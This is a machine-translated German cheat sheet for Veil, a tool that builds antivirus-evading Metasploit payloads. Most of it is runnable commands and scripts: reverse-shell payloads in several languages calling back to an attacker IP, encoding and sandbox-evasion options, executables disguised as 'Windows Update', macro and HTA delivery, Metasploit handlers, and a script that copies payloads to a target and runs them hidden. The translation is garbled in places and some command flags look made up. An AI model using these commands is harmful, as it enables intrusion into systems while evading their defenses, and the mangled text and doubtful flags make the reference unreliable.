Schleier Cheat Blatt

📋 Kopieren Sie alle Befehle 📄 PDF generieren

Überblick

Veil ist ein Werkzeug, um Metasploit Nutzlasten zu erzeugen, die häufige Antiviren-Lösungen umgehen. Es ist Teil des Veil-Frameworks und konzentriert sich auf die Nutzlasterzeugung und Kodierung, um die Erkennung durch Antivirensoftware und Endpunktschutzsysteme zu vermeiden. Veil unterstützt mehrere Programmiersprachen und Kodierungstechniken, um unsichere Nutzlasten für Penetrationstests und rote Teamoperationen zu erzeugen.

ZEIT Warning: Verwenden Sie nur Schleier in Umgebungen, die Sie besitzen oder haben ausdrückliche Erlaubnis zu testen. Unberechtigte Nutzung kann gegen Nutzungsbedingungen oder lokale Gesetze verstoßen. Dieses Tool ist nur für legitime Sicherheitstests bestimmt.

Installation

Automatisierte Installation

```bash

Clone the repository

git clone https://github.com/Veil-Framework/Veil.git cd Veil

Run the setup script

sudo ./config/setup.sh --force --silent

Verify installation

./Veil.py --version ```_

Manuelle Installation

```bash

Install dependencies

sudo apt update sudo apt install -y python3 python3-pip git

Install Python dependencies

pip3 install pycrypto pip3 install distorm3 pip3 install pefile pip3 install capstone

Install additional tools

sudo apt install -y mingw-w64 sudo apt install -y mono-mcs sudo apt install -y golang-go

Clone Veil

git clone https://github.com/Veil-Framework/Veil.git cd Veil

Make executable

chmod +x Veil.py ```_

Docker Installation

```bash

Pull Docker image

docker pull mattiasohlsson/veil

Run Veil in Docker

docker run -it --rm -v $(pwd):/output mattiasohlsson/veil

Create alias for easier usage

echo 'alias veil="docker run -it --rm -v $(pwd):/output mattiasohlsson/veil"' >> ~/.bashrc source ~/.bashrc ```_

Kali Linux Installation

```bash

Veil is pre-installed on Kali Linux

veil

If not installed, install via apt

sudo apt update sudo apt install veil

Update to latest version

cd /usr/share/veil sudo git pull ```_

Basisnutzung

Interaktiver Modus

```bash

Start Veil in interactive mode

./Veil.py

Or if installed system-wide

veil

Navigate the menu system

1) Veil-Evasion (payload generation)

2) Veil-Ordnance (payload delivery)

```_

Befehlszeilenmodus

```bash

List available payloads

./Veil.py -t Evasion --list-payloads

Generate payload with specific options

./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444

Generate payload with custom options

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-dir /tmp/payloads

Show payload options

./Veil.py -t Evasion -p python/meterpreter/rev_tcp --payload-options ```_

Nutzlasterzeugung

Python Payloads

```bash

Python reverse TCP Meterpreter

./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444

Python reverse HTTP Meterpreter

./Veil.py -t Evasion -p python/meterpreter/rev_http --ip 192.168.1.100 --port 80

Python reverse HTTPS Meterpreter

./Veil.py -t Evasion -p python/meterpreter/rev_https --ip 192.168.1.100 --port 443

Python shell reverse TCP

./Veil.py -t Evasion -p python/shellcode_inject/flat --ip 192.168.1.100 --port 4444

Python with custom encoding

./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64 ```_

C# Payloads

```bash

C# reverse TCP Meterpreter

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444

C# reverse HTTP Meterpreter

./Veil.py -t Evasion -p cs/meterpreter/rev_http --ip 192.168.1.100 --port 80

C# reverse HTTPS Meterpreter

./Veil.py -t Evasion -p cs/meterpreter/rev_https --ip 192.168.1.100 --port 443

C# shellcode injection

./Veil.py -t Evasion -p cs/shellcode_inject/virtual --ip 192.168.1.100 --port 4444

C# with process hollowing

./Veil.py -t Evasion -p cs/shellcode_inject/hollow --ip 192.168.1.100 --port 4444 ```_

PowerShell Payloads

```bash

PowerShell reverse TCP

./Veil.py -t Evasion -p powershell/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444

PowerShell reverse HTTP

./Veil.py -t Evasion -p powershell/meterpreter/rev_http --ip 192.168.1.100 --port 80

PowerShell reverse HTTPS

./Veil.py -t Evasion -p powershell/meterpreter/rev_https --ip 192.168.1.100 --port 443

PowerShell with obfuscation

./Veil.py -t Evasion -p powershell/shellcode_inject/psexec --ip 192.168.1.100 --port 4444 ```_

Go Payloads

```bash

Go reverse TCP

./Veil.py -t Evasion -p go/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444

Go reverse HTTP

./Veil.py -t Evasion -p go/meterpreter/rev_http --ip 192.168.1.100 --port 80

Go reverse HTTPS

./Veil.py -t Evasion -p go/meterpreter/rev_https --ip 192.168.1.100 --port 443

Go with custom user agent

./Veil.py -t Evasion -p go/meterpreter/rev_http --ip 192.168.1.100 --port 80 --user-agent "Mozilla/5.0" ```_

Erweiterte Evasionstechniken

Kodierung und Obfuskation

```bash

Base64 encoding

./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64

XOR encoding

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding xor

AES encryption

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encryption aes

Multiple encoding layers

./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64,xor

Custom encoding key

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding-key "MySecretKey123" ```_

Antianalysetechniken

```bash

Sleep before execution

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --sleep 30

Check for virtual machine

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --vm-check

Check for debugger

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug-check

Domain check

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --domain-check

Process check

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --process-check ```_

Benutzerdefinierte Payload-Optionen

```bash

Custom executable icon

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --icon /path/to/icon.ico

Custom executable version info

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --version-info "Microsoft Corporation"

Custom file description

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --file-description "System Update"

Custom product name

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --product-name "Windows Update"

Compile as service

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --service ```_

Lieferung von Lastwagen Methoden

Ausführbare Generation

```bash

Generate Windows executable

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type exe

Generate DLL

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type dll

Generate service executable

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type service

Generate shellcode

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type shellcode

Generate PowerShell script

./Veil.py -t Evasion -p powershell/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type ps1 ```_

Ordnance (Payload-Lieferung)

```bash

Start Veil-Ordnance

./Veil.py -t Ordnance

Generate HTA payload

./Veil.py -t Ordnance -p hta/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444

Generate macro payload

./Veil.py -t Ordnance -p macro/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444

Generate SCT payload

./Veil.py -t Ordnance -p sct/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444

Generate JavaScript payload

./Veil.py -t Ordnance -p js/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 ```_

Integration mit Metasploit

Handler Setup

```bash

Start Metasploit handler for Veil payload

msfconsole -q -x " use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; set ExitOnSession false; exploit -j"

Handler for HTTP payload

msfconsole -q -x " use exploit/multi/handler; set payload windows/meterpreter/reverse_http; set LHOST 192.168.1.100; set LPORT 80; exploit -j"

Handler for HTTPS payload

msfconsole -q -x " use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 192.168.1.100; set LPORT 443; exploit -j" ```_

Resource Scripts

```bash

Create Metasploit resource script

cat > veil_handler.rc << 'EOF' use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.100 set LPORT 4444 set ExitOnSession false exploit -j EOF

Use resource script

msfconsole -r veil_handler.rc

Multi-handler resource script

cat > multi_handler.rc ``<< 'EOF' use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.100 set LPORT 4444 set ExitOnSession false exploit -j

use exploit/multi/handler set payload windows/meterpreter/reverse_http set LHOST 192.168.1.100 set LPORT 80 set ExitOnSession false exploit -j EOF ```_

Automatisierungsskripte

Batch Payload Generation

```bash

!/bin/bash

Generate multiple Veil payloads

LHOST="192.168.1.100" OUTPUT_DIR="veil_payloads_$(date +%Y%m%d_%H%M%S)"

mkdir -p "$OUTPUT_DIR"

Array of payload configurations

declare -a PAYLOADS=( "python/meterpreter/rev_tcp:4444:python_tcp" "python/meterpreter/rev_http:80:python_http" "cs/meterpreter/rev_tcp:4445:cs_tcp" "cs/meterpreter/rev_http:8080:cs_http" "powershell/meterpreter/rev_tcp:4446:ps_tcp" "go/meterpreter/rev_tcp:4447:go_tcp" )

echo "[+] Generating Veil payloads..." echo "[+] LHOST: $LHOST" echo "[+] Output directory: $OUTPUT_DIR"

for payload_config in "$\{PAYLOADS[@]\}"; do IFS=':' read -r payload port name <<< "$payload_config"

echo "[+] Generating $name ($payload:$port)"

./Veil.py -t Evasion \
    -p "$payload" \
    --ip "$LHOST" \
    --port "$port" \
    --output-dir "$OUTPUT_DIR" \
    --output-name "$name" \
    --force

if [ $? -eq 0 ]; then
    echo "  ✓ Success: $name"
else
    echo "  ✗ Failed: $name"
fi

done

echo "[+] Payload generation completed" echo "[+] Generated files:" ls -la "$OUTPUT_DIR"

Generate Metasploit resource script

cat >`` "$OUTPUT_DIR/handlers.rc" << EOF

Metasploit handlers for generated payloads

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST $LHOST set LPORT 4444 set ExitOnSession false exploit -j

use exploit/multi/handler set payload windows/meterpreter/reverse_http set LHOST $LHOST set LPORT 80 set ExitOnSession false exploit -j

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST $LHOST set LPORT 4445 set ExitOnSession false exploit -j

use exploit/multi/handler set payload windows/meterpreter/reverse_http set LHOST $LHOST set LPORT 8080 set ExitOnSession false exploit -j

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST $LHOST set LPORT 4446 set ExitOnSession false exploit -j

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST $LHOST set LPORT 4447 set ExitOnSession false exploit -j EOF

echo "[+] Metasploit resource script created: $OUTPUT_DIR/handlers.rc" ```_

Payload Testing Script

```bash

!/bin/bash

Test generated payloads against antivirus

PAYLOAD_DIR="$1" VIRUSTOTAL_API_KEY="your_api_key_here"

if [ -z "$PAYLOAD_DIR" ]; then echo "Usage: $0 " exit 1 fi

if [ ! -d "$PAYLOAD_DIR" ]; then echo "Error: Directory not found: $PAYLOAD_DIR" exit 1 fi

echo "[+] Testing payloads in: $PAYLOAD_DIR"

Function to upload to VirusTotal

upload_to_vt() \\{ local file="$1" local filename=$(basename "$file")

echo "[+] Uploading $filename to VirusTotal..."

response=$(curl -s -X POST \
    -H "x-apikey: $VIRUSTOTAL_API_KEY" \
    -F "file=@$file" \
    "https://www.virustotal.com/api/v3/files")

if [ $? -eq 0 ]; then
    scan_id=$(echo "$response"|jq -r '.data.id')
    echo "  Scan ID: $scan_id"
    echo "$filename:$scan_id" >> "$PAYLOAD_DIR/vt_scans.txt"
else
    echo "  Upload failed"
fi

\\}

Function to check scan results

check_vt_results() \\{ local scan_id="$1" local filename="$2"

echo "[+] Checking results for $filename..."

response=$(curl -s -X GET \
    -H "x-apikey: $VIRUSTOTAL_API_KEY" \
    "https://www.virustotal.com/api/v3/analyses/$scan_id")

if [ $? -eq 0 ]; then
    status=$(echo "$response"|jq -r '.data.attributes.status')
    if [ "$status" = "completed" ]; then
        stats=$(echo "$response"|jq -r '.data.attributes.stats')
        malicious=$(echo "$stats"|jq -r '.malicious')
        suspicious=$(echo "$stats"|jq -r '.suspicious')
        undetected=$(echo "$stats"|jq -r '.undetected')

        echo "  Status: $status"
        echo "  Malicious: $malicious"
        echo "  Suspicious: $suspicious"
        echo "  Undetected: $undetected"

        echo "$filename,$malicious,$suspicious,$undetected" >> "$PAYLOAD_DIR/detection_results.csv"
    else
        echo "  Status: $status (still processing)"
    fi
else
    echo "  Failed to get results"
fi

\\}

Upload all executables

echo "[+] Uploading payloads..." for file in "$PAYLOAD_DIR"/*.exe; do if [ -f "$file" ]; then upload_to_vt "$file" sleep 15 # Rate limiting fi done

echo "[+] Waiting for scans to complete..." sleep 300 # Wait 5 minutes

Check results

if [ -f "$PAYLOAD_DIR/vt_scans.txt" ]; then echo "filename,malicious,suspicious,undetected" > "$PAYLOAD_DIR/detection_results.csv"

while IFS=':' read -r filename scan_id; do
    check_vt_results "$scan_id" "$filename"
    sleep 15  # Rate limiting
done < "$PAYLOAD_DIR/vt_scans.txt"

echo "[+] Results saved to: $PAYLOAD_DIR/detection_results.csv"

else echo "[-] No scans to check" fi ```_

Payload Bereitstellung Script

```bash

!/bin/bash

Deploy Veil payloads for testing

PAYLOAD_DIR="$1" TARGET_HOST="$2" TARGET_USER="$3"

if [ $# -ne 3 ]; then echo "Usage: $0 " exit 1 fi

echo "[+] Deploying payloads to $TARGET_HOST"

Create remote directory

ssh "$TARGET_USER@$TARGET_HOST" "mkdir -p /tmp/test_payloads"

Copy payloads

for file in "$PAYLOAD_DIR"/*.exe; do if [ -f "$file" ]; then filename=$(basename "$file") echo "[+] Copying $filename..."

    scp "$file" "$TARGET_USER@$TARGET_HOST:/tmp/test_payloads/"

    if [ $? -eq 0 ]; then
        echo "  ✓ Copied successfully"
    else
        echo "  ✗ Copy failed"
    fi
fi

done

Create execution script

cat > /tmp/execute_payloads.ps1 << 'EOF'

PowerShell script to execute payloads

$payloadDir = "C:\tmp\test_payloads" $logFile = "$payloadDir\execution_log.txt"

Get-ChildItem -Path $payloadDir -Filter "*.exe"|ForEach-Object \\{ $payload = $_.FullName $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"

Write-Host "[+] Executing: $($_.Name)"
Add-Content -Path $logFile -Value "$timestamp - Executing: $($_.Name)"

try \\\\{
    Start-Process -FilePath $payload -WindowStyle Hidden
    Add-Content -Path $logFile -Value "$timestamp - Success: $($_.Name)"
\\\\}
catch \\\\{
    Add-Content -Path $logFile -Value "$timestamp - Failed: $($_.Name) - $($_.Exception.Message)"
\\\\}

Start-Sleep -Seconds 5

\\} EOF

Copy execution script

scp /tmp/execute_payloads.ps1 "$TARGET_USER@$TARGET_HOST:/tmp/test_payloads/"

echo "[+] Deployment completed" echo "[+] To execute payloads on target:" echo " ssh $TARGET_USER@$TARGET_HOST" echo " powershell -ExecutionPolicy Bypass -File /tmp/test_payloads/execute_payloads.ps1"

rm /tmp/execute_payloads.ps1 ```_

Evasion Testing

Antivirus Testing

```bash

Test against Windows Defender

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-test defender

Test against multiple AV engines

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-test all

Generate report

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-report

Custom AV testing

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-engines "defender,kaspersky,norton" ```_

Sandbox Evasion

```bash

Generate payload with sandbox evasion

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \ --ip 192.168.1.100 \ --port 4444 \ --sandbox-evasion \ --sleep 60 \ --vm-check \ --debug-check

Time-based evasion

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \ --ip 192.168.1.100 \ --port 4444 \ --time-check \ --execution-delay 300

Environment checks

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \ --ip 192.168.1.100 \ --port 4444 \ --domain-check \ --process-check \ --file-check ```_

Fehlerbehebung

Gemeinsame Themen

Installationsprobleme

```bash

Fix missing dependencies

sudo apt update sudo apt install -y python3-dev python3-pip pip3 install --upgrade pip

Fix Wine issues (for Windows compilation)

sudo dpkg --add-architecture i386 sudo apt update sudo apt install wine32

Fix MinGW issues

sudo apt install mingw-w64-i686-dev mingw-w64-x86-64-dev

Reinstall Veil

cd Veil sudo ./config/setup.sh --force ```_

Fehler bei der Erstellung

```bash

Check compiler availability

which i686-w64-mingw32-gcc which x86_64-w64-mingw32-gcc

Fix C# compilation

sudo apt install mono-mcs mono-complete

Fix Go compilation

export GOPATH=/usr/share/veil/go export PATH=$PATH:/usr/local/go/bin

Debug compilation

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug ```_

Ausgabe von Payload

```bash

Test payload generation

./Veil.py -t Evasion --list-payloads|grep meterpreter

Check payload options

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --payload-options

Verify output

file /var/lib/veil/output/compiled/payload.exe strings /var/lib/veil/output/compiled/payload.exe|grep -i meterpreter

Test payload execution

wine /var/lib/veil/output/compiled/payload.exe ```_

Debugging und Logging

```bash

Enable debug mode

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug

Check Veil logs

tail -f /var/lib/veil/output/veil.log

Verbose output

./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --verbose

Check compilation output

cat /var/lib/veil/output/source/payload.cs ```_

Ressourcen

• [Official Veil Framework](LINK_7 -%20(__LINK_7___)
• [Metasploit Framework](LINK_7 -%20Antivirus%20Evasion%20Techniques
• (__LINK_7___)
• [Windows PE Format](LINK_7 -%20Code%20Obfuscation%20Techniques

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Veil für die Nutzlasterzeugung und Antivirus-Ausweichung. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *